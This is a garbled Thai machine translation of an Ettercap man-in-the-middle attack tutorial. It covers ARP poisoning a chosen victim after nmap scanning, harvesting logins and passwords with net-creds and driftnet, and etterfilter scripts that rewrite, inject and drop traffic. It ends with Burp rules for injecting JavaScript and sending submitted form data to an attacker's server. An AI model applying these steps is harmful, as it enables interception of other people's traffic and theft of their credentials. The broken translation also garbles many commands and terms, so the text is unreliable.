คำแนะนำสำหรับ Ettercap: การโจมตีแบบ man-in-the-middle (MitM), การกักตุนรหัสผ่าน, การเลี่ยง HSTS, การทดแทนข้อมูลบนเซิร์ฟเวอร์, ความเสียหายของตัวกรองและปลั๊กอิน, การลบ BeEF, การติดไวรัสที่ประตูหลัง

โกลอฟนา

ทางเลือกอื่นสำหรับ Ettercap

Ettercap เป็นโปรแกรมโจมตีคนตรงกลางที่ได้รับความนิยมมากที่สุด แต่ตัวไหนดีที่สุด?

  • โดยการปฏิบัติตามคำแนะนำเหล่านี้ คุณจะได้เรียนรู้ว่า Ettercap อาจไม่ได้รับชัยชนะเลย แต่จะมีการติดตั้งโปรแกรมอื่นพร้อมกับโปรแกรมนั้นในช่องทางประมวลผลการจราจร
  • อย่างไรก็ตาม มีความเป็นไปได้ที่แนวทางนี้เป็นแกนหลักของ UNIX - โปรแกรมหนึ่งสร้างขึ้นจากงานเดียว และผู้ใช้ปลายทางจะรวมโปรแกรมต่างๆ เข้าด้วยกันเพื่อให้ได้ผลลัพธ์ตามที่ต้องการ
  • ด้วยวิธีนี้ จะง่ายต่อการแก้ไขโค้ดโปรแกรม จาก "จุด" เล็กๆ น้อยๆ ดังกล่าว คุณสามารถสร้างระบบที่สามารถพับได้และมีความยืดหยุ่นทุกรูปแบบ
  • Tim มีคอนโซลแบบเปิดอยู่ห้าคอนโซลที่มีงานต่างกัน การทำงานของโปรแกรมได้รับการออกแบบมาเพื่อให้ได้ผลลัพธ์เดียว - แต่มันไม่ได้เป็นแบบแมนนวลมากนัก มันแค่ซับซ้อนกว่า มีความเป็นไปได้ที่จะเกิดข้อผิดพลาดในทุกขั้นตอน และ ปรับทั้งระบบ є ไม่ได้ใช้งาน
  • Net-Creds สูดดม:
  • URL ที่ส่งแล้ว
  • ส่งคำขอ POST
  • การเข้าสู่ระบบ/รหัสผ่านจากแบบฟอร์ม HTTP
  • การเข้าสู่ระบบ/รหัสผ่านด้วยการตรวจสอบสิทธิ์ HTTP พื้นฐาน
  • เรื่องตลก HTTP
  • การเข้าสู่ระบบ FTP/รหัสผ่าน
  • การเข้าสู่ระบบ / รหัสผ่าน IRC
  • เข้าสู่ระบบ / รหัสผ่าน POP
  • การเข้าสู่ระบบ IMAP/รหัสผ่าน

การเข้าสู่ระบบ Telnet/รหัสผ่าน

การเข้าสู่ระบบ SMTP/รหัสผ่าน

สตริงชุมชน SNMP (แถวพื้นหลัง)

โปรโตคอล NTLMv1/v2 ทั้งหมดรองรับ HTTP, SMB, LDAP ฯลฯ เคอร์เบรอส (การรวบรวมโอเวอร์โฟลว์นั้นดี และดริฟต์เน็ตในแผนนี้ง่ายกว่า - ไม่แสดงภาพโอเวอร์โฟลว์):

สลับเครื่องไปที่โหมดโอเวอร์โหลด (การส่งต่อ)

เสียงก้อง "1" > /proc/sys/net/ipv4/ip_forward เปิดตัว Ettercap จากอินเตอร์เฟซแบบกราฟิก -กเอตเตอร์แคป-จี ตอนนี้เลือก:

เจ้าภาพ ที่จุดย่อยใหม่สแกนหาโฮสต์ - หลังจากการสแกนเสร็จสิ้น ให้เลือกรายชื่อเจ้าภาพ ในยาโคสติวัตถุประสงค์1 เลือกเราเตอร์ ().

เพิ่มไปยังเป้าหมายที่ 1 ) ในyakostіวัตถุประสงค์2 เลือกอุปกรณ์ที่คุณต้องการโจมตี (เพิ่มไปยังเป้าหมายที่ 2

อย่างไรก็ตาม ขั้นตอนแรกอาจเป็นความผิดที่นี่ โดยเฉพาะอย่างยิ่งหากมีโฮสต์จำนวนมาก ในเกี่ยวกับเจ้าภาพ หรือให้เจาะจงกว่านั้น เกี่ยวกับบริษัทที่ผลิตแผนที่การตกเลือด:

Nmap -sn 192.168.1.0/24

เนื่องจากข้อมูลเหล่านี้ไม่เพียงพอ คุณจึงสามารถสแกนโดยใช้ระบบปฏิบัติการต่อไปนี้:

Nmap -O 192.168.1.0/24

เช่นเดียวกับ Bachimo เครื่องที่มี IP 192.168.1.33 ปรากฏขึ้นพร้อมกับ Windows เพราะมันไม่ใช่สัญญาณของไฟไหม้ แล้วไงล่ะ?

😉 ฮ่าๆ

เรามอบให้ตัวเองเสมือนว่าเป็นเพื่อน ตอนนี้เรามาดูรายการเมนูกันดีกว่ามิทม์ - เลือกที่นั่นพิษ ARP... ทำเครื่องหมายในช่อง.

สูดดมการเชื่อมต่อระยะไกล

เราเริ่มรวบรวมการเก็บเกี่ยวในหน้าต่างเดียวที่เราเปิด

เครดิตสุทธิ

มิฉะนั้น (สามารถเปิดทั้งสองโปรแกรมได้โดยไม่มีตัวเลือก)

ดริฟท์เน็ต

มารวบรวมข้อมูลทันที:

ทางด้านขวาของตาข่ายลอยมีหน้าต่างอีกบานหนึ่งเปิดขึ้น แสดงให้เห็นภาพที่ล้นออกมา

ในหน้าต่าง net-creds เรามีไซต์และรหัสผ่านมากมาย:

1.2 ชุด Ettercap + Burp 3. การตรวจสอบข้อมูล (รายการไซต์และรหัสผ่านที่เก็บไว้) ใน Ettercapในเมนู ดูі แท็บที่มีให้เราการเชื่อมต่อ โปรไฟล์- คุณยังสามารถทำเครื่องหมายที่ช่องได้

แก้ไขที่อยู่ IP

(สร้างที่อยู่ IP ขึ้นมาใหม่)

การเชื่อมต่อ - tse เป็นที่เข้าใจได้ การเชื่อมต่อ

Ettercap รวบรวมโปรไฟล์จากหน่วยความจำสำหรับโฮสต์สกินที่ตรวจพบ

มีการรวบรวมรหัสผ่านส่วนตัวที่นั่น

ข้อมูลบัญชีคลาวด์ที่เก็บไว้ (รหัสผ่าน) จะถูกระบุด้วยเครื่องหมายกากบาทสำหรับโปรไฟล์ใด:

คุณไม่จำเป็นต้องพึ่งพาโปรไฟล์มากนัก ตัวอย่างเช่น มีข้อมูลเข้าสู่ระบบและรหัสผ่านที่เก็บไว้สำหรับ FTP และบริการอื่นๆ ซึ่งโปรแกรมสามารถตีความข้อมูลเป็นข้อมูลคลาวด์ได้อย่างชัดเจน

ซึ่งไม่รวมถึงข้อมูลการตรวจสอบสิทธิ์พื้นฐาน รายการเข้าสู่ระบบ และรหัสผ่านสำหรับแบบฟอร์มบนเว็บ เป็นต้น

ที่ Connections ข้อมูลที่มีแนวโน้มมากที่สุดจะถูกทำเครื่องหมายด้วยดาว:

คุณสามารถคลิกที่แต่ละรายการเพื่อดูรายละเอียด:<файл>เพื่อไม่ให้ล้อเล่นกับดาวเล็กๆ ทั้งหมดในรายการทั้งหมด คุณสามารถจัดเรียงตามฟิลด์นี้ และดาวทั้งหมดจะปรากฏที่ด้านบนหรือด้านล่าง:<файл>การรับรองความถูกต้องพื้นฐานของ Spyman:<логфайл>รหัสผ่านเข้าสู่ระบบสำหรับ Yandex (ดูด้านล่าง):<логфайл>นี่คือรายการข้อมูลคลาวด์สำหรับ VKontakte:<логфайл>ข้อมูลเดียวกันนี้รวบรวมจากคอนโซลด้านล่าง:<логфайл>หากคุณต้องการบันทึกผลลัพธ์ของโปรแกรมโรบอติก ให้ใช้ตัวเลือกเหล่านี้ (ระบุคีย์เมื่อเริ่ม Ettercap:<логфайл>ตัวเลือกการบันทึก: -w, --write<логфайл>เขียนข้อมูลที่ถ่ายโอนไปยัง pcapfile

-L, --log

บันทึกการรับส่งข้อมูลทั้งหมดจากเธอ

หมายเหตุ: ในการทดสอบทั้งหมด ตัวกรอง Ettercap ไม่ได้ผลสำหรับฉัน

สิ่งสำคัญคือต้องเข้าใจว่าทางด้านขวามือในคุณสมบัติของอุปกรณ์หรือในโปรแกรม... นอกจากนี้สำหรับเวอร์ชัน 0.8.2 (ยังคงอยู่ในขณะนี้) มีรายงานข้อผิดพลาดเกี่ยวกับปัญหาเกี่ยวกับตัวกรอง

ตามรายงานข้อผิดพลาดและฟอรัม ตัวกรองอาจขัดข้องบ่อยครั้งหรือใช้งานไม่ได้เป็นเวลานาน

และหลุมที่มีการเปลี่ยนแปลงเมื่อ 5 เดือนที่แล้ว https://github.com/Ettercap/ettercap/tree/filter-improvements แล้ว การปรับปรุงตัวกรอง (พร้อมตัวกรองแบบขยาย)และเพื่อจุดประสงค์นี้และสำหรับเวอร์ชันที่มีพื้นที่เก็บข้อมูล จึงมีการทดสอบที่ซับซ้อนสูง มีการทดสอบตัวกรองต่าง ๆ ในใจที่แตกต่างกัน ใช้เวลานานหลายชั่วโมง แต่ไม่มีผลลัพธ์

ก่อนที่จะพูด หากต้องการติดตั้งเวอร์ชันปรับปรุงตัวกรองบน ​​Kali Linux คุณต้องทำสิ่งนี้:

Sudo apt-get ลบ ettercap กราฟิก ettercap ทั่วไป sudo apt-get ติดตั้ง git debhelper วัวกระทิงตรวจสอบ cmake flex ghostscript libbsd-dev libcurl4-openssl-dev libgtk2.0-dev libltdl-dev libluajit-5 libpcap-dev libpcre3-dev libssl- dev libgtk-3-dev ghostscript groff libtool libpcre3 libncurses5-dev git clone -b การปรับปรุงตัวกรอง https://github.com/Ettercap/ettercap.git cd ettercap/ mkdir = เปิด ../ ทำ sudo ทำการติดตั้ง

ถ้า (ip.proto == TCP && tcp.dst == 80) ( ถ้า (ค้นหา (DATA.data, "ยอมรับการเข้ารหัส")) ( แทนที่ ("ยอมรับการเข้ารหัส", "ยอมรับขยะ!"); # หมายเหตุ: ลำดับการเปลี่ยนจะเหมือนกับลำดับเดิม msg("zapped Accept-Encoding!\n" ) ) if (ip.proto == TCP && tcp.src == 80) ( แทนที่("src=", " src =\"http://www.ironngeek.com/images/jollypwn.png\" "); แทนที่("SRC=", "src=\"http://www.irongeek.com/images/jollypwn.png \" "); แทนที่("src=", "src=\"http://www.irongeek.com/images/jollypwn.png\" "); แทนที่("SRC=", "src=\" http msg("ตัวกรองวิ่ง\n" );

รวบรวมไฟล์:

Etterfilter img_replacer.filter -o img_replacer.ef

ผลการรวบรวม:

Etterfilter 0.8.2 ลิขสิทธิ์ 2001-2015 ทีมพัฒนา Ettercap โหลดตารางโปรโตคอล 14 ตารางแล้ว: DECODED DATA udp tcp esp gre icmp ipv6 ip arp wifi fddi tr eth โหลดค่าคงที่ 13 ค่าแล้ว: VRRP OSPF GPRP "img_replacer.filter" เสร็จแล้ว

เปิดเผย meta-tree เสร็จแล้ว การแปลงป้ายกำกับเป็นการชดเชยจริงเสร็จสิ้นแล้วเขียนเอาต์พุตไปที่ "img_replacer.ef" เสร็จแล้ว

-> สคริปต์ป้อนได้สูงสุด 18 vbuds

สำคัญ-ฟ

โปรแกรมใดๆ ที่ต้องนำเข้าตัวกรองจากไฟล์ที่อยู่ด้านหลังคีย์

หลังจากรวบรวมชื่อไฟล์ใหม่ของเราด้วยตัวกรอง img_replacer.ef คำสั่งจะมีลักษณะดังนี้:

Ettercap -G -F img_replacer.ef

# การแทนที่ข้อความในแพ็กเก็ต: if (ip.proto == TCP && search(DATA.data, "lol"))( แทนที่("lol", "smh"); msg("filter ran"); ) # แสดง การแจ้งเตือน หากพอร์ต tcp เป็น 22 if (ip.proto == TCP) ( if (tcp.src == 22 || tcp.dst == 22) ( msg("SSH packet\n"); ) ) # บันทึก ปริมาณการใช้ telnet ทั้งหมดรวมถึง visconati./program ในทุกแพ็กเก็ต if (ip.proto == TCP) ( if (tcp.src == 23 || tcp.dst == 23) ( log(DATA.data, "./logfile) .log "); exec("./program"); ​​​​) ) # บันทึกการรับส่งข้อมูลทั้งหมดยกเว้น http if (ip.proto == TCP && tcp.src != 80 && tcp.dst != 80) ( log( DATA .data , "./logfile.log" ); พูดถึงเรา...\n"); drop();kill(); ) # บันทึกแพ็กเก็ต ssh ที่ถอดรหัสแล้วซึ่งสอดคล้องกับไวรัสปกติถ้า (ip.proto = = TCP) ( if (tcp.src == 22 || tcp.dst == 22) ( if (regex(DECODED.data, ".*login.*")) ( บันทึก(DECODED.data, "./decrypted_log "); ) ) ) # เข้าสู่แพ็กเก็ตถ้า (ip.ttl< 5) { msg("The packet will die soon\n"); } # то же самое для IPv6, но делая тривиальный тест убеждаемся, что перед нами действительно IPv6 пакеты if (eth.proto == IP6 && ipv6.hl < 5) { msg("The IPv6 packet will die soon\n"); } # сравнение строки на данный сдвиг if (DATA.data + 40 == "ette") { log(DATA.data, "./logfile"); } # вставить файл после указанного пакета if (tcp.src == 21 && search(DATA.data, "root")) { inject("./fake_response"); } # целиком заменить пакет на другой if (tcp.src == 23 && search(DATA.data, "microsoft")) { drop(); inject("./fake_telnet"); } # Изменение бинарных данных используя внешнюю программу if (udp.dst == 53 && pcre_regex(DATA.data, ".*\x03com\x00.*")) { log(DATA.data, "/tmp/payload"); drop(); execinject("/bin/sed "s/\x03com\x00/\x02my\x04page\x02de\x00/g" /tmp/payload"); udp.len += 7; exec("/bin/rm /tmp/payload"); msg("faked"); } # фильтровать только указанный IP адрес if (ip.src == "192.168.0.2") { drop(); } # делать то же самое для IPv6 if (ipv6.src == "2001:db8::1") { drop(); } # комбинируем IPv4 и IPv6 if (eth.proto == IP && ip.dst == "192.168.0.2") { msg("drop IPv4"); drop(); } if (eth.proto == IP6 && ipv6.dst == "2001:db8::1") { msg("drop IPv6"); drop(); } # транслировать tcp пакеты с порта 80 на 81 if (tcp.dst == 80) { tcp.dst -= 1; tcp.dst += 2; } # найти и покалечить пакеты ESP if (ip.proto == ESP) { DATA.data = "DEADDECAF"; }

4.2 การแทนที่ข้อมูลโดยใช้ Burp

เปิดใช้งาน Ettercap และ Burp ตามที่อธิบายไว้ในย่อหน้าที่ 1.2 หรือย่อหน้าที่ 2.2

ในเรอเราไป พร็อกซี -> ตัวเลือก- รู้จักที่นั่น จับคู่และแทนที่- การโจมตี เพิ่มการเพิ่มกฎใหม่

  • ส่วนหัวของคำขอ- ฉันจะขอชื่อเรื่อง
  • ขอร่างกาย- ฉันจะล้างร่างกาย
  • ส่วนหัวของการตอบกลับ- คำบรรยาย
  • ร่างกายตอบสนอง- เนื้อความของเส้น
  • ขอชื่อพารามิเตอร์- ชื่อของพารามิเตอร์จะถูกป้อน
  • ขอค่าพารามิเตอร์- มีการเขียนค่าของพารามิเตอร์
  • ขอบรรทัดแรก- แถวแรกถูกชะล้างลง

หากคุณต้องการเปลี่ยนข้อมูลที่ส่งโดย GET ไปที่ส่วนหัว

ใน HTML เค้าโครงยังเข้าใจกันว่าเป็น head (แท็ก head)

จนกว่าชื่อนี้จะกล่าวอีกสักหน่อยอย่าทำงานหนักหนึ่งร้อยเซ็นต์

มีการพูดคุยเล็กน้อยเกี่ยวกับส่วนหัวของแพ็กเก็ต

.*<\/title> </p><p> <title>หากคุณต้องการเปลี่ยนหน้า HTML แทน คุณต้องเปลี่ยนส่วนหัวของคำขอ และเลือกเนื้อหาการตอบสนองก่อน เนื่องจากคุณต้องการเปลี่ยนส่วนหัวแทน

พิษ ARP... โดยหลักการแล้วหากคุณไม่คุ้นเคยกับการตรวจจับแบบปกติ ไม่มีอะไรต้องกังวล: HTML ทดสอบมากมาย ส่วนสิ่งที่ฉันไม่เข้าใจก็เพิกเฉย - และคุณสามารถทำกำไรจากมันได้.

หากคุณสามารถแสดงนิพจน์ทั่วไปได้ฉันก็เคารพคุณ)))

ตัวอย่างเช่น มีการสร้างกฎใหม่: ส่วนหัวของคำขอถูกเปลี่ยนเป็นเนื้อหาการตอบสนอง

พิษ ARP... โดยหลักการแล้วหากคุณไม่คุ้นเคยกับการตรวจจับแบบปกติ ไม่มีอะไรต้องกังวล: HTML ทดสอบมากมาย ส่วนสิ่งที่ฉันไม่เข้าใจก็เพิกเฉย - และคุณสามารถทำกำไรจากมันได้.

ที่มุมขวาบน (ใต้เค้าโครง) มีข้อความว่า "ฉันเจ๋ง!"

คุณสามารถแทรก CSS, โค้ด JavaScript หรือข้อความอะไรก็ได้ที่คุณต้องการ

คุณสามารถลบหน้าเหล่านี้ทั้งหมดแล้วกรอกข้อมูลในหน้าของคุณเอง - ทุกอย่างเป็นไปตามจินตนาการของคุณ

แนวคิดคือการปรับเปลี่ยนรูปแบบสกินเล็กน้อยเพื่อให้ข้อมูลถูกส่งไปยังเซิร์ฟเวอร์ดั้งเดิมและเซิร์ฟเวอร์ของผู้โจมตี (ใช้การส่งหลายรายการสำหรับรูปแบบสกิน)